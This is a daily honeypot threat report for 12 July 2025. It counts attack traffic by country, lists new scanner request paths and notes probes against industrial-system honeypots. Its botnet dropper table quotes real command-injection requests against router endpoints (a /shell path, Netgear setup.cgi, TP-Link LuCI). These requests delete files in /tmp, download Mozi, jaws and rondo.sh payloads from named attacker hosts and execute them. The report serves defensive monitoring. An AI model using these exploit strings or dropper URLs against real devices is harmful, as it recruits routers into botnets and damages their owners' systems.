Daily Report: 2025-07-12#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 12 stage 1 IP address(es), linked to 6 dropper URL(s).
There are 12 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1241 requests were recorded during the day, originating from 12 different countries, with a peak of 225 requests coming from DE.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
JP | Germany |
DE | Germany |
BR | Germany |
BR | Germany |
DE | Germany |
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
8.222.219.91 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
47.100.64.195 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
117.72.66.27 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
36.255.4.8 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
223.155.21.37 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
87.121.84.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O- |
45.115.89.178 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.115.89.178:59093/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
118.194.249.197 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.135.88 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
36.156.102.59 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
45.135.194.11 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1 |
117.72.211.135 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
124 | 1 | GET /shell.aspx HTTP/1.1 |
223 | 1 | GET /laravel/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1 |
224 | 1 | GET /public/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1 |
225 | 1 | GET /core/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1 |
226 | 1 | GET /vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1 |
420 | 1 | GET /Nmap/folder/check1752313936 HTTP/1.1 |
425 | 1 | GET /NmapUpperCheck1752313936 HTTP/1.1 |
433 | 1 | GET /OEXp HTTP/1.1 |
436 | 1 | GET /nmaplowercheck1752313936 HTTP/1.1 |
474 | 1 | GET /rs/application-about HTTP/1.1 |
475 | 1 | GET /json/login_session HTTP/1.1 |
476 | 1 | GET /photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 225 | DE |
1 | 179 | US |
2 | 167 | CN |
3 | 150 | GB |
4 | 86 | FR |
5 | 83 | RU |
6 | 56 | HK |
7 | 55 | SG |
8 | 42 | PL |
9 | 34 | KR |
10 | 30 | NL |
11 | 28 | ZA |
12 | 16 | BG |
13 | 12 | GH |
14 | 11 | SC |
15 | 8 | MU |
16 | 8 | BR |
17 | 7 | UA |
18 | 5 | BE |
19 | 5 | JP |
20 | 4 | AO |
21 | 4 | SE |
22 | 4 | IN |
23 | 3 | KZ |
24 | 2 | AU |
25 | 2 | AE |
26 | 2 | LV |
27 | 2 | LA |
28 | 2 | IL |
29 | 2 | ES |
30 | 2 | IE |
31 | 1 | NG |
32 | 1 | AR |
33 | 1 | TH |
34 | 1 | EE |
35 | 1 | MK |